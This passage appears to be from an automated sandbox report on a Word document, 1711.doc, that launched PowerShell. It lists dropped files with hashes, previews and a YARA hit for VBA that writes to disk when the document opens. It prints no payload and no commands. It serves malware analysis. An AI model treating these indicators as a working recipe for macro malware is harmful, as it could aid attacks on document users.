                                                                                                                                                                                                                  SSDEEP:3:+lEv3nWl+/t+Al/bJdAtip/zunllllill3Vkttlmlnl:+A3WlAt+At4Xnll/G3
                                                                                                                                                                                                                  MD5:7ADE2B01C2356CD8E36C319B8D345D96
                                                                                                                                                                                                                  SHA1:9D2F0EDDEBF85DD6E816C3A81FF9EFA1F3A32B9F
                                                                                                                                                                                                                  SHA-256:19FBBA2859455466CA003838C05CC59CAFD777B63A5DF63D3BDE5C396C0BB2DB
                                                                                                                                                                                                                  SHA-512:0EF11C34A2307E94F386F6952D1780CD537943D1C62703A5D01C79015C0A5DA7AEE215209097FA9A1B41FC10CC79AEEDDFDE34F2CCAD92E76566A9B66AEC34D3
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview: eE#......................................3...w.......y.......w...............w.......w....:O.....w..................C.UK.....y..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\228B70BA-96BF-49A2-BAE9-6D7972869BA5
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                                                                  File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):140193
                                                                                                                                                                                                                  Entropy (8bit):5.357924087660622
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:1536:ucQIfgxrBdA3gBwtnQ9DQW+z2k4Ff7nXbovidXiE6LWmE9:OuQ9DQW+zYXfH
                                                                                                                                                                                                                  MD5:BC5B16546FF935863E164008B70EBB46
                                                                                                                                                                                                                  SHA1:5ACABF8FB71E9F94376C76CE57C63A3D428C1D6C
                                                                                                                                                                                                                  SHA-256:AB486F6BC137D7EFC6FB1EDA506BE4182AA27DD981E403375129EB6CD4CFF0D1
                                                                                                                                                                                                                  SHA-512:977CB1C56C8D6DC846A318D3A56CAC0507E938972EE60CEFD696798281F249EADEBFAC71BEF116FCDACF675731D50CFBA63D7C3FAFD76B8D4A41ADAE3A550A75
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview: <?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2021-11-22T10:01:13">.. Build: 16.0.14715.30527-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:
                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\5EEF27A6.png
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 1127 x 490, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):121507
                                                                                                                                                                                                                  Entropy (8bit):7.978393301250379
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:3072:oXwhJd0+y7ukYe4uYum1GdgOpVXGuhCUqc:oXw50+OukzVXV2uhDj
                                                                                                                                                                                                                  MD5:D3C11BC087FAF4372F4C5D37E06FCFFD
                                                                                                                                                                                                                  SHA1:40A9FE4D47DADFDB1463D63F14D6D60641AC19E5
                                                                                                                                                                                                                  SHA-256:6F49F13CEF0667A75A3E55767CD769F476EB3FF400BDA8CB3FBF47BA8B0A7077
                                                                                                                                                                                                                  SHA-512:C50363E3CA99B4537A8BA625D84CD0A8C2E8FB15D1FF0163E967D3536E373F3449EB4489EC117766D78B1386D60192453FAE8C372119E32D98E58B07844216EB
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview: .PNG........IHDR...g.........&.......sRGB.........IDATx^..`....^..K.,[.w..tB..Hh.B......B.IH.4z3....1.\q..z?..m...=.d.P....".........7...]g..!I...`.o.@.. .D...."@.... .D`.%`.......]......T.1.4.A..@8.|....."@.... .D...."...0...".'.CS...7.......jn..TM..~(..!........."@.... .D....".....0.C.$..y.....(^..IK.z...VM.&...G:.) .AV5v...!...`.."H.`.....C.'.%.3w--..>.I..."@.... .D...."..#..R.d..&L[3...5.zj.{/...5..u.C...; .P,.xY.T.4%=...!:$.)..)..#..[>..F.zD.... .D...."@........D.k.0v......t3..w..66.+.d........+....K.....G.=,H.Ur..x..2E. ...O"...:.g.Le...;...O..qw....n...$*...."@.... .D.....J #B.|M.qS.M<..5......j.e.O.!vL.qa.)*D.$).d.."...v..{....:..,.vy.._.k...:#...&........2.p>^,.g.b...a7....C...N....+..ke.g&#.r...Q)D...."@.... .D...+..U.....'.f..P5..=[#q.a.G...W.VF.Y.e..e=.km......]2.7rh.C..u...d.Ru..;c.;.V....*..:^]..5CQ.W....&..$..|.J2.....V4{.U..i....py.t.....,.....+..U.r+..0..R\.s....NB..$#.....~....R".....k..{.... .D....".W.dD.q.1m..-......E4<t..}
                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRF{3FBF80BF-E144-402A-AB00-22C522DF80B7}.tmp
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):49152
                                                                                                                                                                                                                  Entropy (8bit):4.791632956671569
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:768:Pc/plLQxx12HtK6z0DcB/plLQxx12HtK6z0D:6lLQxx12HtK6z0YlLQxx12HtK6z0
                                                                                                                                                                                                                  MD5:F891379A1806E6A11733C87FB30DB025
                                                                                                                                                                                                                  SHA1:553685217C2A08B1B56E59A749A9FB2CEF696A35
                                                                                                                                                                                                                  SHA-256:752CAC548A161A64B01DC200B4810A2308DC4B8B73AC9CA0454855056E6B73F7
                                                                                                                                                                                                                  SHA-512:9C4B1B49D637214E8F0EC62D3933B04B0CF474DE7C6BE7F8F06AE0A9D05A2C6CA2C4BC7417E3BACC24F2D6341E3F5C332871469FD501802944136F92B89C42F7
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview: ......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRS{521AB53C-1F2D-413C-8011-B893289A85E3}.tmp
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):2
                                                                                                                                                                                                                  Entropy (8bit):1.0
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:3:X:X
                                                                                                                                                                                                                  MD5:32649384730B2D61C9E79D46DE589115
                                                                                                                                                                                                                  SHA1:053D8D6CEEBA9453C97D0EE5374DB863E6F77AD4
                                                                                                                                                                                                                  SHA-256:E545D395BB3FD971F91BF9A2B6722831DF704EFAE6C1AA9DA0989ED0970B77BB
                                                                                                                                                                                                                  SHA-512:A4944ADFCB670ECD1A320FF126E7DBC7FC8CC4D5E73696D43C404E1C9BB5F228CF8A6EC1E9B1820709AD6D4D28093B7020B1B2578FDBC764287F86F888C07D9C
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview: ..
                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRS{9EE2F9D3-844A-448C-93FB-84314B295DC1}.tmp
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1536
                                                                                                                                                                                                                  Entropy (8bit):1.6413622548786062
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:6:rlEPgsn1F1YsuTyavlEtSYd9XwY2sQmh5epe8P+7WAeSTBFXZSuIehx:ePLF10yWEtSYW9oH8JAeOBBZSmX
                                                                                                                                                                                                                  MD5:91473136D20E3046BECA18C78CE9BBE7
                                                                                                                                                                                                                  SHA1:014B29FADC9F1EB72ADEBAB7A157BF9789953462
                                                                                                                                                                                                                  SHA-256:7A57B63B9EB2FA46EC6C49F9D792DE64710966EA99730E6B18702F49D988A15F
                                                                                                                                                                                                                  SHA-512:4ABA8620775E931315BAE02D9F3C72188413831342C1BC67EC1F5C0FD37D0F662ABD04EBED5D3613CB8BAC159B87457BB87FCF4E6992262ABE4981B95EAAE5A0
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview: ../........... . . ... ... ..... . ..... . ... ......... . . ......... ........... . . ....... ... ... . ...........................................................................................................................................................................................................................................................................................................................................................................................................................................6...8...B...D...F...J...L...l...n...p...r...t...v...x...z...|.......................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRS{C4306DA8-3134-42DC-857A-E2C8FA5CD236}.tmp
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1024
                                                                                                                                                                                                                  Entropy (8bit):0.05390218305374581
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:3:ol3lYdn:4Wn
                                                                                                                                                                                                                  MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                                                                                                                                                                                  SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                                                                                                                                                                                  SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                                                                                                                                                                                  SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):8003
                                                                                                                                                                                                                  Entropy (8bit):4.839308921501875
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:192:yxoe5oVsm5emdVVFn3eGOVpN6K3bkkjo59gkjDt4iWN3yBGHh9smidcU6CXpOTik:DBVoGIpN6KQkj2Wkjh4iUx0mib4J
                                                                                                                                                                                                                  MD5:937C6E940577634844311E349BD4614D
                                                                                                                                                                                                                  SHA1:379440E933201CD3E6E6BF9B0E61B7663693195F
                                                                                                                                                                                                                  SHA-256:30DC628AB2979D2CF0D281E998077E5721C68B9BBA61610039E11FDC438B993C
                                                                                                                                                                                                                  SHA-512:6B37FE533991631C8290A0E9CC0B4F11A79828616BEF0233B4C57EC7C9DCBFC274FB7E50FC920C4312C93E74CE621B6779F10E4016E9FD794961696074BDFBFA
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview: PSMODULECACHE......<.e...Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........<.e...T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):20488
                                                                                                                                                                                                                  Entropy (8bit):5.6072334934969135
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:Tt9FWX0lAPJWQOLvh4KnKudcUSjulpEIij9nSrz3GQ1evrfMza:/aObh4KKuuUSClm967daf
                                                                                                                                                                                                                  MD5:402FBE97FF53FDDFCC16C3CDDAC78C6E
                                                                                                                                                                                                                  SHA1:1BA91D5F4D6D7C813B536BD40AFEA20A363CD8E3
                                                                                                                                                                                                                  SHA-256:5660CB335217D3ADB7B7321855F49AC2C6F4DC3CF4477DEF5A043111403075A0
                                                                                                                                                                                                                  SHA-512:AB1CA7CF7A198BE9E05754F3B2DE3F80A329447D8D16A0F613772B60FE04BB27894654E0E91EBB8299B6E4DA65D6228C3806221DFB96773692EA7D04A736B7A5
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview: @...e...................h...............*.G..........@..........H...............<@.^.L."My...:P..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)........System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.....#.......System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].E.....%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins
                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\VBE\MSForms.exd
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):152056
                                                                                                                                                                                                                  Entropy (8bit):4.414433482333769
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:1536:fmmk/zolWWpFpKKHAeedydju4HTbTuo+o5aQxJudUl9yhQL3ow:fC88WpFpKKHHedydFeo+oQLUlPow
                                                                                                                                                                                                                  MD5:3D6C80467F22055400A5B30D4DD9598D
                                                                                                                                                                                                                  SHA1:1172A3029D2657F4581F5A886290AA31B559EEA7
                                                                                                                                                                                                                  SHA-256:F2E88E2537FEC66D4F3EBD4450F6C8207E439C8526B049F8CA6501481F911A11
                                                                                                                                                                                                                  SHA-512:0529E1BC35882AEC691C6E0FC84FB63B7F0F1EE53CA8D76AED236BAE9392EA2E6BDB36594CD5530F868B6E5C4DD3A64B2AA12BEEFDCEB887F20F3A79F271A36E
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview: MSFT................Q................................$......$....... ...................d.......,...........X....... ...........L...........x.......@...........l.......4...........`.......(...........T...................H...........t.......<...........h.......0...........\.......$...........P...........|.......D...........p.......8...........d.......,...........X....... ...........L...........x.......@........ ..l ... ..4!...!...!..`"..."..(#...#...#..T$...$...%...%...%..H&...&...'..t'...'..<(...(...)..h)...)..0*...*...*..\+...+..$,...,...,..P-...-......|.......D/.../...0..p0...0..81...1...2..d2...2..,3...3...3..X4...4.. 5...5...5..L6...6...7..x7...7..@8...8...9..l9...9..4:...:...:..`;...;..(<...<...<..T=...=...>...>...>..H?...?...@..t@...@..<A...A...B..hB.......B...........^...............g...............W...............F..............<G...............g...............i...I..............T..................................................................................................
                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ivljvnov.dnx.ps1
                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                  File Type:very short file (no magic)
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1
                                                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:3:U:U
                                                                                                                                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview: 1
                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rjtsltui.gs0.psm1
                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                  File Type:very short file (no magic)
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1
                                                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:3:U:U
                                                                                                                                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview: 1
                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\~DFE2F261E3909AA4D4.TMP
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):49152
                                                                                                                                                                                                                  Entropy (8bit):5.018582507630294
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:768:rkax/vHMetK6nYmBvtCnXZs7Dq0y5BU50uIxMH:lx3HMuK6Ym/Cnps39qU5pI
                                                                                                                                                                                                                  MD5:D371FE31D4F951D5BD8A57F7072AA424
                                                                                                                                                                                                                  SHA1:50EA1D2D815EC7B071B4A3388CFA4229928D942A
                                                                                                                                                                                                                  SHA-256:12342D67B505C694831D87F4F3A742987C3DE00565E1DC0354D3951FBFF7E918
                                                                                                                                                                                                                  SHA-512:49FF822E23896CD68BECC10BD4B3BAC2D4511F0B1852D768CE4496ED154E26025C06A84D7A4526A9770F9FA437CF1463C271887927FCDE705FDDF7CCBBF623F2
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                                                  • Rule: SUSP_VBA_FileSystem_Access, Description: Detects suspicious VBA that writes to disk and is activated on document open, Source: C:\Users\user\AppData\Local\Temp\~DFE2F261E3909AA4D4.TMP, Author: Florian Roth
                                                                                                                                                                                                                  Preview: ......................>...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................6....................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...........T...8...E...:...C...<...=...>...?...@...A...B...5...D.......F...]...H...I...J...K...L...M...N...9...P...Q...R...S...........V...W...X...Y...Z...[...\...O...^...................................................................................................................
                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\1711.LNK
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Sep 30 13:47:09 2020, mtime=Mon Nov 22 18:01:14 2021, atime=Mon Nov 22 18:01:11 2021, length=135948, window=hide
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1026
                                                                                                                                                                                                                  Entropy (8bit):4.700737445312133
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:12:8MkC0Uk6CHiXO6gGXb2D6U+Wk4T8A7R5DjAf/yxZ4nDySGM4t2Y+xIBjKZm:8LorYY4T8AF5HAfKxZYDyY7aB6m
                                                                                                                                                                                                                  MD5:9C0FA7A9D0CE752EE3B4F30AFB49BA47
                                                                                                                                                                                                                  SHA1:B964316B0F8C8D20AAF8CCB4C670893CC2B0880D
                                                                                                                                                                                                                  SHA-256:DADE1806B80DE63CEBCF92FF6DBBB983F7C094AC08E9047B20E7FA41EF960F0E
                                                                                                                                                                                                                  SHA-512:4F3F54B39C246303F38D8A0D3D368F07433178A3FC2838187486F52EB7786AC91E6303BEC80865A23D6E70AED71909DC3A3F34655CCDDB00F2D033A8CFFEA128
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview: L..................F.... ......8......R.......P.................................P.O. .:i.....+00.../C:\...................x.1......Ng...Users.d......L..vS......................:......B..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....T.1.....>Q.u..user..>.......NM.vS.......S.....................xf.a.l.f.o.n.s.....~.1.....>Q.u..Desktop.h.......NM.vS.......Y..............>.......&.D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....Z.2.....vS&. .1711.doc..B......>Q.uvS&.....f......................Iu.1.7.1.1...d.o.c.......O...............-.......N...........>.S......C:\Users\user\Desktop\1711.doc........\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.1.7.1.1...d.o.c.........:..,.LB.)...Aw...`.......X.......813435...........!a..%.H.VZAj...|Yt.+........W...!a..%.H.VZAj...|Yt.+........W..............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0.5.3.0.6.2.3.3.2.-.1.0.0.2.........9...1SPS..mD..pH.H@..=x.....h....H.....
                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):59
                                                                                                                                                                                                                  Entropy (8bit):4.424791041423791
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:3:bDuMJlYUdruYCmX1USXruYCv:bCs2Ms
                                                                                                                                                                                                                  MD5:38B1B69A7D2D3E1C386BC4E37CB0A52B
                                                                                                                                                                                                                  SHA1:F761BA2E5930369A2AE6B055664B1E06E53E3646
                                                                                                                                                                                                                  SHA-256:EE6611A14ABADA654761586768A652637235A616AF1030FD8BC52EA555FFF18C
                                                                                                                                                                                                                  SHA-512:CA698A65875D0DBAFBA21E6384ED97672BCFDBA0C20BA92EFF147139B938412D393C14A6F46C6BE13AC2F4DD0314F57C7BDF7DF76544D4269207234AA3874FFF
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview: [folders]..Templates.LNK=0..1711.LNK=0..[doc]..1711.LNK=0..
                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):162
                                                                                                                                                                                                                  Entropy (8bit):3.2383484540671748
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:3:Rl/ZdPul13CDlqzJAgP9Dr8Kn:RtZNufCQigP9P8Kn
                                                                                                                                                                                                                  MD5:46F4823949A556BFEA5B765EBD42BB64
                                                                                                                                                                                                                  SHA1:BA9BDFC155426C1D1EA12E43BF94B6BB0EF6C3F0
                                                                                                                                                                                                                  SHA-256:6D360F9F02CE1A909EE4C4329105282430A97C95A91943A8303AD19BD6E3F2A2
                                                                                                                                                                                                                  SHA-512:9DA76343D00276409C3B545BE642E4F1E7B74B6545A941DE08C15D900E18F5B63E981BF38C606DED67CCA53F9F1D7A50EBA656A59B2280E2A634CC581621B461
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview: .pratesh................................................p.r.a.t.e.s.h.........{67&.............................6+&.....^.j@..jT..j`..jDB.jZR.js6/&................
                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                                                                  File Type:Little-endian UTF-16 Unicode text, with CR line terminators
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):20
                                                                                                                                                                                                                  Entropy (8bit):2.8954618442383215
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:3:QVNliGn:Q9rn
                                                                                                                                                                                                                  MD5:C4F79900719F08A6F11287E3C7991493
                                                                                                                                                                                                                  SHA1:754325A769BE6ECCC664002CD8F6BDB0D0B8CA4D
                                                                                                                                                                                                                  SHA-256:625CA96CCA65A363CC76429804FF47520B103D2044BA559B11EB02AB7B4D79A8
                                                                                                                                                                                                                  SHA-512:0F3C498BC7680B4C9167F790CC0BE6C889354AF703ABF0547F87B78FEB0BAA9F5220691DF511192B36AD9F3F69E547E6D382833E6BC25CDB4CD2191920970C5F
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview: ..p.r.a.t.e.s.h.....
                                                                                                                                                                                                                  C:\Users\user\Desktop\~$1711.doc
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):162
                                                                                                                                                                                                                  Entropy (8bit):3.2383484540671748
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:3:Rl/ZdPul13CDlqzJAgP9Dr8Kn:RtZNufCQigP9P8Kn
                                                                                                                                                                                                                  MD5:46F4823949A556BFEA5B765EBD42BB64
                                                                                                                                                                                                                  SHA1:BA9BDFC155426C1D1EA12E43BF94B6BB0EF6C3F0
                                                                                                                                                                                                                  SHA-256:6D360F9F02CE1A909EE4C4329105282430A97C95A91943A8303AD19BD6E3F2A2
                                                                                                                                                                                                                  SHA-512:9DA76343D00276409C3B545BE642E4F1E7B74B6545A941DE08C15D900E18F5B63E981BF38C606DED67CCA53F9F1D7A50EBA656A59B2280E2A634CC581621B461
                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                  Preview: .pratesh................................................p.r.a.t.e.s.h.........{67&.............................6+&.....^.j@..jT..j`..jDB.jZR.js6/&................
                                                                                                                                                                                                                  C:\Users\user\Documents\20211122\PowerShell_transcript.813435.2FeLMNmk.20211122110119.txt
                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                  File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):8809
                                                                                                                                                                                                                  Entropy (8bit):5.5691522866908825
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:BZn/SNJG0CKGYS+x1qDo1ZEG0CKGYS+xPqeZJ/SNJG0CKGYS+x1qDo1ZUgbAEbTN:p0C20CG0Ca//oQ/0CGd0jS0jSYjD
                                                                                                                                                                                                                  MD5:CE9C3E936CA194A99E6527EB5E631358
